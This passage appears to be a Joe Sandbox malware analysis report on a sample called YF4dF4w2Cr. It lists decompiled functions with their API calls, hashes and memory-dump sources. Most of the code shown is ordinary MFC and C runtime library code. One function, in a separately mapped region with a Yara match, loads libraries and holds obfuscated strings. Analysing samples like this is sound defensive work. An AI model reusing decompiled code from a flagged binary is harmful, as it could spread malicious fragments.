                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Cursor$Window$CaptureKillLoadParentRectReleaseTimerUpdate
                  • String ID: `&E
                  • API String ID: 2135910768-1929257993
                  • Opcode ID: 1ee815c25b10352745542af0c80f1d5c47765e78def4f617f18e9468ae99dcfd
                  • Instruction ID: eb199d0561742021218959bc1adea6b17d397f6cb78be9abe42bb6aed1478ba6
                  • Opcode Fuzzy Hash: 1ee815c25b10352745542af0c80f1d5c47765e78def4f617f18e9468ae99dcfd
                  • Instruction Fuzzy Hash: E151CF31A04105EFDF24DBA5D9A8AFEB7F5FB44300F20046AE546D3291E738ADC18B59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004489F0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 49COMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E004489F0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t18;
				void* _t23;
				void* _t39;
				intOrPtr _t43;
				void* _t44;

				_t39 = __edx;
				_t29 = __ebx;
				_push(0x14);
				E00431A9B(E0044CC9D, __ebx, __edi, __esi);
				E00448F7B(_t44 - 0x14, 0);
				_t43 =  *0x46743c; // 0x24310d8
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t18 = E00447826( *((intOrPtr*)(_t44 + 8)), E00447732(0x467554));
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E004485F1(__ebx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E00430C66(_t44 - 0x20, "bad cast");
							E00430CF4(_t44 - 0x20, 0x45e790);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x46743c =  *((intOrPtr*)(_t44 - 0x10));
						E00447769( *((intOrPtr*)(_t44 - 0x10)));
						E0044911C(_t29, _t39, _t41, _t43, _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E00448FA3(_t44 - 0x14);
				return E00431B73(_t41);
			}








                  0x004489f0
                  0x004489f0
                  0x004489f0
                  0x004489f7
                  0x00448a01
                  0x00448a06
                  0x00448a0c
                  0x00448a15
                  0x00448a21
                  0x00448a26
                  0x00448a2a
                  0x00448a2e
                  0x00448a34
                  0x00448a3a
                  0x00448a3b
                  0x00448a42
                  0x00448a45
                  0x00448a4f
                  0x00448a5d
                  0x00448a5d
                  0x00448a62
                  0x00448a67
                  0x00448a6d
                  0x00448a73
                  0x00448a30
                  0x00448a30
                  0x00448a30
                  0x00448a2e
                  0x00448a79
                  0x00448a80
                  0x00448a8c

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004489F7
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00448A01
                  • int.LIBCPMT ref: 00448A18
                    • Part of subcall function 00447732: std::_Lockit::_Lockit.LIBCPMT ref: 00447745
                  • std::locale::_Getfacet.LIBCPMT ref: 00448A21
                  • ctype.LIBCPMT ref: 00448A3B
                  • std::bad_exception::bad_exception.LIBCMT ref: 00448A4F
                  • __CxxThrowException@8.LIBCMT ref: 00448A5D
                  • std::locale::facet::_Incref.LIBCPMT ref: 00448A6D
                  • std::locale::facet::facet_Register.LIBCPMT ref: 00448A73
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                  • String ID: TuF$bad cast
                  • API String ID: 2535038987-1496521168
                  • Opcode ID: d1a9c288e7aec9ff4f5bf7d24857f49445e3ddbaba58f23c9a0fa4d8bebe908b
                  • Instruction ID: ff64b05e2f82beb86cc65c12f0f5b39e1603df0fa0b9ef5944976ff18bc40764
                  • Opcode Fuzzy Hash: d1a9c288e7aec9ff4f5bf7d24857f49445e3ddbaba58f23c9a0fa4d8bebe908b
                  • Instruction Fuzzy Hash: 5501A13190421597EF05FBA188829BE72356F44328F54021FF1107B2E1DF7C9A06DB9D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042BE83, Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                  Download Yara Rule
                  C-Code - Quality: 81%
                  			E0042BE83(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t156;
				intOrPtr* _t158;
				intOrPtr _t165;
				intOrPtr* _t176;
				short _t178;
				short _t180;
				short _t182;
				short _t184;
				short _t186;
				short _t188;
				short _t192;
				char* _t193;
				short _t194;
				char* _t195;
				short _t196;
				char* _t198;
				char _t199;
				char* _t201;
				char _t202;
				short _t209;
				char* _t210;
				short* _t216;
				char* _t217;
				int _t220;
				int _t225;
				short _t226;
				void* _t227;
				char _t277;
				char _t278;
				signed int _t287;
				signed int _t292;
				intOrPtr* _t312;
				intOrPtr* _t313;
				void* _t316;
				void* _t317;
				void* _t324;

				_push(0x28);
				_t156 = E00431A9B(E0044C838, __ebx, __edi, __esi);
				_t316 = __ecx;
				_t311 = 1;
				if( *((intOrPtr*)(__ecx + 0x78)) != 1) {
					L29:
					return E00431B73(_t156);
				}
				_t158 =  *((intOrPtr*)(__ecx + 0x80));
				_t301 = _t317 - 0x28;
				_push(_t317 - 0x28);
				_push(_t158);
				if( *((intOrPtr*)( *_t158 + 0x50))() < 0) {
					__eflags =  *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00000200;
					if(__eflags == 0) {
						L28:
						_push(_t317 - 0x24);
						_t312 = E0042BA2F(0, _t316, _t301, _t311, _t316, _t324);
						_push(_t317 - 0x2c);
						 *(_t317 - 4) = 2;
						_t165 =  *((intOrPtr*)(E0042BBEC(0, _t316, _t301, _t312, _t316, _t324)));
						_t302 =  *((intOrPtr*)(_t165 - 0xc));
						( *(_t316 + 0x74))[0x38] =  *((intOrPtr*)( *_t312 - 0xc)) -  *((intOrPtr*)(_t165 - 0xc));
						E004010B0( *((intOrPtr*)(_t317 - 0x2c)) + 0xfffffff0,  *((intOrPtr*)(_t165 - 0xc)));
						 *(_t317 - 4) =  *(_t317 - 4) | 0xffffffff;
						E004010B0( *(_t317 - 0x24) + 0xfffffff0,  *((intOrPtr*)(_t165 - 0xc)));
						_push(_t317 - 0x34);
						_t313 = E0042BA2F(0, _t316,  *((intOrPtr*)(_t165 - 0xc)), _t312, _t316, _t324);
						_push(_t317 - 0x30);
						 *(_t317 - 4) = 3;
						( *(_t316 + 0x74))[0x3a] =  *((intOrPtr*)( *_t313 - 0xc)) -  *((intOrPtr*)( *((intOrPtr*)(E0042BCDF(0, _t316,  *((intOrPtr*)(_t165 - 0xc)), _t313, _t316, _t324))) - 0xc));
						E004010B0( *((intOrPtr*)(_t317 - 0x30)) + 0xfffffff0, _t302);
						_t156 = E004010B0( *((intOrPtr*)(_t317 - 0x34)) + 0xfffffff0, _t302);
						goto L29;
					}
					_t176 =  *((intOrPtr*)(__ecx + 0x80));
					_t301 = _t317 - 0x24;
					 *(_t317 - 0x24) = 0;
					__eflags =  *((intOrPtr*)( *_t176))(_t176, 0x454754, _t317 - 0x24);
					if(__eflags < 0) {
						goto L28;
					}
					_t178 =  *(_t317 - 0x24);
					_t301 = _t317 - 0x20;
					 *(_t317 - 0x20) = 0;
					__eflags =  *((intOrPtr*)( *_t178 + 0x6c))(_t178, _t317 - 0x20);
					if(__eflags < 0) {
						L26:
						_t180 =  *(_t317 - 0x24);
						L27:
						 *((intOrPtr*)( *_t180 + 8))(_t180);
						goto L28;
					}
					_t182 =  *(_t317 - 0x20);
					_t301 = _t317 - 0x1c;
					__eflags =  *((intOrPtr*)( *_t182 + 0x24))(_t182, _t317 - 0x1c);
					if(__eflags < 0) {
						L25:
						_t184 =  *(_t317 - 0x20);
						 *((intOrPtr*)( *_t184 + 8))(_t184);
						goto L26;
					}
					_t186 =  *(_t317 - 0x1c);
					_t301 = _t317 - 0x18;
					 *((intOrPtr*)(_t317 - 0x2c)) = 0;
					__eflags =  *((intOrPtr*)( *_t186 + 0xc))(_t186, 1, _t317 - 0x18, _t317 - 0x2c);
					if(__eflags != 0) {
						L24:
						_t188 =  *(_t317 - 0x1c);
						 *((intOrPtr*)( *_t188 + 8))(_t188);
						goto L25;
					}
					E00405C38(_t317 - 0x14);
					 *(_t317 - 4) = 1;
					_t311 = ( *(_t316 + 0x74))[0x1c];
					_t192 =  *(_t317 - 0x18);
					 *(_t317 - 0x10) = 0;
					_t193 =  *((intOrPtr*)( *_t192 + 0x14))(_t192, 0x80058000, _t317 - 0x10);
					__eflags = _t193;
					if(_t193 >= 0) {
						PathRemoveFileSpecW( *(_t317 - 0x10));
						_t225 = WideCharToMultiByte(0, 0,  *(_t317 - 0x10), 0xffffffff, _t311, ( *(_t316 + 0x74))[0x20] - 1, 0, 0);
						_t311 =  &(_t311[_t225]);
						__eflags = _t311;
						__imp__CoTaskMemFree( *(_t317 - 0x10));
					}
					while(1) {
						_t194 =  *(_t317 - 0x18);
						_t301 = _t317 - 0x10;
						 *(_t317 - 0x10) = 0;
						_t195 =  *((intOrPtr*)( *_t194 + 0x14))(_t194, 0x80058000, _t317 - 0x10);
						__eflags = _t195;
						if(_t195 >= 0) {
							E0042B03E(0, _t317 - 0x14, _t301,  *(_t317 - 0x10));
							PathRemoveFileSpecW(E0042B001(_t317 - 0x14));
							E0041FF66(_t317 - 0x14, 0xffffffff);
							_t287 =  *( *((intOrPtr*)(_t317 - 0x14)) - 0xc);
							_t216 =  *(_t317 - 0x10);
							__eflags = _t216[_t287] - 0x5c;
							if(_t216[_t287] == 0x5c) {
								_t287 = _t287 + 1;
								__eflags = _t287;
							}
							_t217 =  *(_t316 + 0x74);
							_t301 = _t217[0x20] + _t217[0x1c] - _t311 - 1;
							_t220 = WideCharToMultiByte(0, 0,  &(( *(_t317 - 0x10))[_t287]), 0xffffffff, _t311, _t217[0x20] + _t217[0x1c] - _t311 - 1, 0, 0);
							_t311 =  &(_t311[_t220]);
							__eflags = _t311;
							__imp__CoTaskMemFree( *(_t317 - 0x10));
						}
						_t196 =  *(_t317 - 0x18);
						 *((intOrPtr*)( *_t196 + 8))(_t196);
						_t198 =  *(_t316 + 0x74);
						_t277 = _t198[0x20];
						_t199 = _t198[0x1c];
						__eflags = _t311 - _t277 + _t199 - 1;
						if(_t311 >= _t277 + _t199 - 1) {
							break;
						}
						_t209 =  *(_t317 - 0x1c);
						_t301 = _t317 - 0x18;
						_t210 =  *((intOrPtr*)( *_t209 + 0xc))(_t209, 1, _t317 - 0x18, _t317 - 0x2c);
						__eflags = _t210;
						if(_t210 == 0) {
							continue;
						}
						break;
					}
					_t201 =  *(_t316 + 0x74);
					_t278 = _t201[0x20];
					_t202 = _t201[0x1c];
					__eflags = _t311 - _t278 + _t202 - 1;
					if(_t311 >= _t278 + _t202 - 1) {
						 *((char*)(( *(_t316 + 0x74))[0x20] + ( *(_t316 + 0x74))[0x1c] - 2)) = 0;
						 *((char*)(( *(_t316 + 0x74))[0x20] + ( *(_t316 + 0x74))[0x1c] - 1)) = 0;
					} else {
						 *_t311 = 0;
					}
					 *(_t317 - 4) =  *(_t317 - 4) | 0xffffffff;
					__eflags =  *((intOrPtr*)(_t317 - 0x14)) + 0xfffffff0;
					E004010B0( *((intOrPtr*)(_t317 - 0x14)) + 0xfffffff0, _t301);
					goto L24;
				}
				_t226 =  *(_t317 - 0x28);
				_t301 = _t317 - 0x10;
				 *(_t317 - 0x10) = 0;
				_t227 =  *((intOrPtr*)( *_t226 + 0x14))(_t226, 0x80058000, _t317 - 0x10);
				_t321 = _t227;
				if(_t227 >= 0) {
					_push( *(_t317 - 0x10));
					E0042BE3F(0, _t317 - 0x14, 1, __ecx, _t321);
					 *(_t317 - 4) = 0;
					PathRemoveFileSpecW(E0042B001(_t317 - 0x14));
					E0041FF66(_t317 - 0x14, 0xffffffff);
					_t292 =  *( *((intOrPtr*)(_t317 - 0x14)) - 0xc);
					_t301 =  *(_t317 - 0x10);
					if(_t301[_t292] == 0x5c) {
						_t292 = _t292 + 1;
					}
					WideCharToMultiByte(0, 0,  &(_t301[_t292]), 0xffffffff, ( *(_t316 + 0x74))[0x24], ( *(_t316 + 0x74))[0x28], 0, 0);
					 *((char*)(( *(_t316 + 0x74))[0x28] + ( *(_t316 + 0x74))[0x24] - 1)) = 0;
					WideCharToMultiByte(0, 0,  *(_t317 - 0x10), 0xffffffff, ( *(_t316 + 0x74))[0x1c], ( *(_t316 + 0x74))[0x20] - 1, 0, 0);
					 *((char*)(( *(_t316 + 0x74))[0x20] + ( *(_t316 + 0x74))[0x1c] - 2)) = 0;
					_t311 =  *(_t316 + 0x74);
					 *((char*)(E00431A10(_t311[0x1c]) + _t311[0x1c] + 1)) = 0;
					__imp__CoTaskMemFree( *(_t317 - 0x10));
					 *(_t317 - 4) =  *(_t317 - 4) | 0xffffffff;
					_t324 =  *((intOrPtr*)(_t317 - 0x14)) + 0xfffffff0;
					E004010B0( *((intOrPtr*)(_t317 - 0x14)) + 0xfffffff0, _t301);
				}
				_t180 =  *(_t317 - 0x28);
				goto L27;
			}







































                  0x0042be83
                  0x0042be8a
                  0x0042be8f
                  0x0042be93
                  0x0042be97
                  0x0042c1f5
                  0x0042c1fa
                  0x0042c1fa
                  0x0042be9d
                  0x0042bea5
                  0x0042bea8
                  0x0042bea9
                  0x0042beb1
                  0x0042bf8d
                  0x0042bf94
                  0x0042c161
                  0x0042c164
                  0x0042c16c
                  0x0042c171
                  0x0042c174
                  0x0042c180
                  0x0042c187
                  0x0042c18f
                  0x0042c199
                  0x0042c1a1
                  0x0042c1a8
                  0x0042c1b0
                  0x0042c1b8
                  0x0042c1bd
                  0x0042c1c0
                  0x0042c1db
                  0x0042c1e5
                  0x0042c1f0
                  0x00000000
                  0x0042c1f0
                  0x0042bf9a
                  0x0042bfa0
                  0x0042bfa9
                  0x0042bfb1
                  0x0042bfb3
                  0x00000000
                  0x00000000
                  0x0042bfb9
                  0x0042bfbc
                  0x0042bfc0
                  0x0042bfc9
                  0x0042bfcb
                  0x0042c158
                  0x0042c158
                  0x0042c15b
                  0x0042c15e
                  0x00000000
                  0x0042c15e
                  0x0042bfd1
                  0x0042bfd6
                  0x0042bfde
                  0x0042bfe0
                  0x0042c14f
                  0x0042c14f
                  0x0042c155
                  0x00000000
                  0x0042c155
                  0x0042bfe6
                  0x0042bfed
                  0x0042bff2
                  0x0042bffb
                  0x0042bffd
                  0x0042c146
                  0x0042c146
                  0x0042c14c
                  0x00000000
                  0x0042c14c
                  0x0042c006
                  0x0042c012
                  0x0042c015
                  0x0042c018
                  0x0042c020
                  0x0042c026
                  0x0042c029
                  0x0042c02b
                  0x0042c030
                  0x0042c048
                  0x0042c051
                  0x0042c051
                  0x0042c053
                  0x0042c053
                  0x0042c059
                  0x0042c059
                  0x0042c05c
                  0x0042c065
                  0x0042c06b
                  0x0042c06e
                  0x0042c070
                  0x0042c078
                  0x0042c086
                  0x0042c091
                  0x0042c099
                  0x0042c09c
                  0x0042c09f
                  0x0042c0a4
                  0x0042c0a6
                  0x0042c0a6
                  0x0042c0a6
                  0x0042c0a7
                  0x0042c0b7
                  0x0042c0c2
                  0x0042c0cb
                  0x0042c0cb
                  0x0042c0cd
                  0x0042c0cd
                  0x0042c0d3
                  0x0042c0d9
                  0x0042c0dc
                  0x0042c0df
                  0x0042c0e2
                  0x0042c0e9
                  0x0042c0eb
                  0x00000000
                  0x00000000
                  0x0042c0ed
                  0x0042c0f6
                  0x0042c0fd
                  0x0042c100
                  0x0042c102
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042c102
                  0x0042c108
                  0x0042c10b
                  0x0042c10e
                  0x0042c115
                  0x0042c117
                  0x0042c126
                  0x0042c133
                  0x0042c119
                  0x0042c119
                  0x0042c119
                  0x0042c13a
                  0x0042c13e
                  0x0042c141
                  0x00000000
                  0x0042c141
                  0x0042beb7
                  0x0042beba
                  0x0042bec3
                  0x0042bec9
                  0x0042becc
                  0x0042bece
                  0x0042bed4
                  0x0042beda
                  0x0042bee2
                  0x0042beeb
                  0x0042bef6
                  0x0042befe
                  0x0042bf01
                  0x0042bf09
                  0x0042bf0b
                  0x0042bf0b
                  0x0042bf25
                  0x0042bf30
                  0x0042bf48
                  0x0042bf53
                  0x0042bf57
                  0x0042bf66
                  0x0042bf6d
                  0x0042bf76
                  0x0042bf7a
                  0x0042bf7d
                  0x0042bf7d
                  0x0042bf82
                  0x00000000

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042BE8A
                  • PathRemoveFileSpecW.SHLWAPI(00000000,?), ref: 0042BEEB
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 0042BF25
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 0042BF48
                  • _strlen.LIBCMT ref: 0042BF5D
                  • CoTaskMemFree.OLE32(?), ref: 0042BF6D
                  • PathRemoveFileSpecW.SHLWAPI(?), ref: 0042C030
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 0042C048
                  • CoTaskMemFree.OLE32(?), ref: 0042C053
                  • PathRemoveFileSpecW.SHLWAPI(00000000), ref: 0042C086
                    • Part of subcall function 0042BE3F: __EH_prolog3.LIBCMT ref: 0042BE46
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 0042C0C2
                  • CoTaskMemFree.OLE32(?), ref: 0042C0CD
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$FileFreePathRemoveSpecTask$H_prolog3$_strlen
                  • String ID:
                  • API String ID: 40125332-0
                  • Opcode ID: 0de55032d2de1d9b05756dd0f3eb9acb81df7eac66d34590316005367f3a3aa4
                  • Instruction ID: 89a8467473b8a028d0dcd0eb024d72da42818e89e32c94e27286938f1a2e76e1
                  • Opcode Fuzzy Hash: 0de55032d2de1d9b05756dd0f3eb9acb81df7eac66d34590316005367f3a3aa4
                  • Instruction Fuzzy Hash: 65C15970A00619DFCB04DFA8C994DAEB7B9FF88314B50465DF522AB3A1CB35AD01CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02318206, Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 307libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 02318CD0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: ($}81$(&S$10Jj$7x$GE$WBt$[I7g$x|
                  • API String ID: 1029625771-105190942
                  • Opcode ID: fbabede92cdd5195f8ee65217b1c1f4fd201e03de6a21e041b6b9c77bde49291
                  • Instruction ID: 75f66f325e7de714b1438c3866d76d606abe7545fdf055dc633def60090430cd
                  • Opcode Fuzzy Hash: fbabede92cdd5195f8ee65217b1c1f4fd201e03de6a21e041b6b9c77bde49291
                  • Instruction Fuzzy Hash: 5B32B5B4816369CBEB61DF829A897CDBB74BB11304F6086C8D2593B214CB750B86CF85
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042408E, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E0042408E(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t131;
				intOrPtr _t195;
				intOrPtr* _t223;
				void* _t226;
				intOrPtr _t229;

				_push(0x38);
				E00431A9B(E0044C068, __ebx, __edi, __esi);
				_t223 = __ecx;
				 *((intOrPtr*)(_t226 - 0x30)) = 0;
				 *((intOrPtr*)(_t226 - 0x34)) = 0x452b4c;
				 *(_t226 - 4) = 0;
				 *((intOrPtr*)(_t226 - 0x28)) = 0;
				 *((intOrPtr*)(_t226 - 0x2c)) = 0x452b4c;
				 *((intOrPtr*)(_t226 - 0x20)) = 0;
				 *((intOrPtr*)(_t226 - 0x24)) = 0x452b4c;
				 *(_t226 - 4) = 2;
				E00423A90(_t226 - 0x2c,  *(_t226 + 8));
				E00413342(_t226 - 0x44,  *(_t226 + 8));
				InflateRect(_t226 - 0x44,  ~( *(_t226 + 0xc)),  ~( *(_t226 + 0x10)));
				IntersectRect(_t226 - 0x44, _t226 - 0x44,  *(_t226 + 8));
				E00423A90(_t226 - 0x24, _t226 - 0x44);
				E00423059(0, _t226 - 0x34, _t223, CreateRectRgn(0, 0, 0, 0));
				E00423F00(_t226 - 0x34, _t226 - 0x2c, _t226 - 0x24, 3);
				_t228 =  *((intOrPtr*)(_t226 + 0x20));
				if( *((intOrPtr*)(_t226 + 0x20)) == 0) {
					 *((intOrPtr*)(_t226 + 0x20)) = E00423F2F(0, _t223, 0x452b4c, _t228);
				}
				_t195 =  *((intOrPtr*)(_t226 + 0x20));
				_t229 = _t195;
				_t230 = _t229 == 0;
				if(_t229 == 0) {
					E00406436(0, _t195, _t223, 0x452b4c, _t230);
				}
				if( *((intOrPtr*)(_t226 + 0x24)) == 0) {
					 *((intOrPtr*)(_t226 + 0x24)) = _t195;
				}
				 *((intOrPtr*)(_t226 - 0x18)) = 0;
				 *((intOrPtr*)(_t226 - 0x1c)) = 0x452b4c;
				 *((intOrPtr*)(_t226 - 0x10)) = 0;
				 *((intOrPtr*)(_t226 - 0x14)) = 0x452b4c;
				 *(_t226 - 4) = 4;
				if( *(_t226 + 0x14) != 0) {
					E00423059(0, _t226 - 0x1c, _t223, CreateRectRgn(0, 0, 0, 0));
					E00423EE0(_t226 - 0x2c,  *(_t226 + 0x14));
					CopyRect(_t226 - 0x44,  *(_t226 + 0x14));
					InflateRect(_t226 - 0x44,  ~( *(_t226 + 0x18)),  ~( *(_t226 + 0x1c)));
					IntersectRect(_t226 - 0x44, _t226 - 0x44,  *(_t226 + 0x14));
					E00423EE0(_t226 - 0x24, _t226 - 0x44);
					E00423F00(_t226 - 0x1c, _t226 - 0x2c, _t226 - 0x24, 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x24)) + 4))) {
						E00423059(0, _t226 - 0x14, _t223, CreateRectRgn(0, 0, 0, 0));
						E00423F00(_t226 - 0x14, _t226 - 0x1c, _t226 - 0x34, 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x24)) + 4)) &&  *(_t226 + 0x14) != 0) {
					E00422B77(_t223, _t226 - 0x1c);
					 *((intOrPtr*)( *_t223 + 0x50))(_t226 - 0x44);
					 *(_t226 + 0x14) = E00423194(_t223,  *((intOrPtr*)(_t226 + 0x24)));
					E0041B463(_t223,  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x40)),  *((intOrPtr*)(_t226 - 0x3c)) -  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x38)) -  *((intOrPtr*)(_t226 - 0x40)), 0x5a0049);
					E00423194(_t223,  *(_t226 + 0x14));
				}
				_t131 = _t226 - 0x14;
				if( *((intOrPtr*)(_t226 - 0x10)) == 0) {
					_t131 = _t226 - 0x34;
				}
				E00422B77(_t223, _t131);
				 *((intOrPtr*)( *_t223 + 0x50))(_t226 - 0x44);
				 *(_t226 + 0x14) = E00423194(_t223,  *((intOrPtr*)(_t226 + 0x20)));
				E0041B463(_t223,  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x40)),  *((intOrPtr*)(_t226 - 0x3c)) -  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x38)) -  *((intOrPtr*)(_t226 - 0x40)), 0x5a0049);
				_t238 =  *(_t226 + 0x14);
				if( *(_t226 + 0x14) != 0) {
					E00423194(_t223,  *(_t226 + 0x14));
				}
				E00422B77(_t223, 0);
				 *(_t226 - 4) = 3;
				 *((intOrPtr*)(_t226 - 0x14)) = 0x452b4c;
				E0040ADD4(0, _t226 - 0x14, _t223, 0x452b4c, _t238);
				 *(_t226 - 4) = 2;
				 *((intOrPtr*)(_t226 - 0x1c)) = 0x452b4c;
				E0040ADD4(0, _t226 - 0x1c, _t223, 0x452b4c, _t238);
				 *(_t226 - 4) = 1;
				 *((intOrPtr*)(_t226 - 0x24)) = 0x452b4c;
				E0040ADD4(0, _t226 - 0x24, _t223, 0x452b4c, _t238);
				 *(_t226 - 4) = 0;
				 *((intOrPtr*)(_t226 - 0x2c)) = 0x452b4c;
				E0040ADD4(0, _t226 - 0x2c, _t223, 0x452b4c, _t238);
				 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t226 - 0x34)) = 0x452b4c;
				return E00431B73(E0040ADD4(0, _t226 - 0x34, _t223, 0x452b4c,  *(_t226 - 4)));
			}








                  0x0042408e
                  0x00424095
                  0x0042409a
                  0x004240a3
                  0x004240a6
                  0x004240a9
                  0x004240ac
                  0x004240af
                  0x004240b2
                  0x004240b5
                  0x004240be
                  0x004240c2
                  0x004240cd
                  0x004240e2
                  0x004240f0
                  0x004240fd
                  0x00424110
                  0x00424122
                  0x00424127
                  0x0042412a
                  0x00424131
                  0x00424131
                  0x00424134
                  0x00424139
                  0x0042413e
                  0x00424140
                  0x00424142
                  0x00424142
                  0x0042414a
                  0x0042414c
                  0x0042414c
                  0x0042414f
                  0x00424152
                  0x00424155
                  0x00424158
                  0x0042415b
                  0x00424162
                  0x00424176
                  0x00424181
                  0x0042418d
                  0x004241a3
                  0x004241b1
                  0x004241be
                  0x004241d0
                  0x004241e1
                  0x004241f1
                  0x00424203
                  0x00424203
                  0x004241e1
                  0x00424214
                  0x00424221
                  0x0042422e
                  0x0042423b
                  0x00424259
                  0x00424263
                  0x00424263
                  0x00424268
                  0x0042426e
                  0x00424270
                  0x00424270
                  0x00424276
                  0x00424283
                  0x00424290
                  0x004242ae
                  0x004242b3
                  0x004242b6
                  0x004242bd
                  0x004242bd
                  0x004242c5
                  0x004242cd
                  0x004242d1
                  0x004242d4
                  0x004242dc
                  0x004242e0
                  0x004242e3
                  0x004242eb
                  0x004242ef
                  0x004242f2
                  0x004242fa
                  0x004242fd
                  0x00424300
                  0x00424305
                  0x0042430c
                  0x00424319

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00424095
                    • Part of subcall function 00423A90: CreateRectRgnIndirect.GDI32(?), ref: 00423A9B
                    • Part of subcall function 00413342: CopyRect.USER32 ref: 0041334E
                  • InflateRect.USER32(?,?,?), ref: 004240E2
                  • IntersectRect.USER32 ref: 004240F0
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00424106
                    • Part of subcall function 00423F00: CombineRgn.GDI32(?,?,?,?), ref: 00423F25
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0042416C
                  • CopyRect.USER32 ref: 0042418D
                  • InflateRect.USER32(?,?,?), ref: 004241A3
                  • IntersectRect.USER32 ref: 004241B1
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 004241E7
                    • Part of subcall function 00423F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 00423F77
                    • Part of subcall function 00423F2F: CreatePatternBrush.GDI32(00000000), ref: 00423F84
                    • Part of subcall function 00423F2F: DeleteObject.GDI32(00000000), ref: 00423F90
                    • Part of subcall function 0041B463: PatBlt.GDI32(?,?,?,?,?,?), ref: 0041B47A
                    • Part of subcall function 00423194: SelectObject.GDI32(?,00000000), ref: 004231BA
                    • Part of subcall function 00423194: SelectObject.GDI32(?,?), ref: 004231D0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
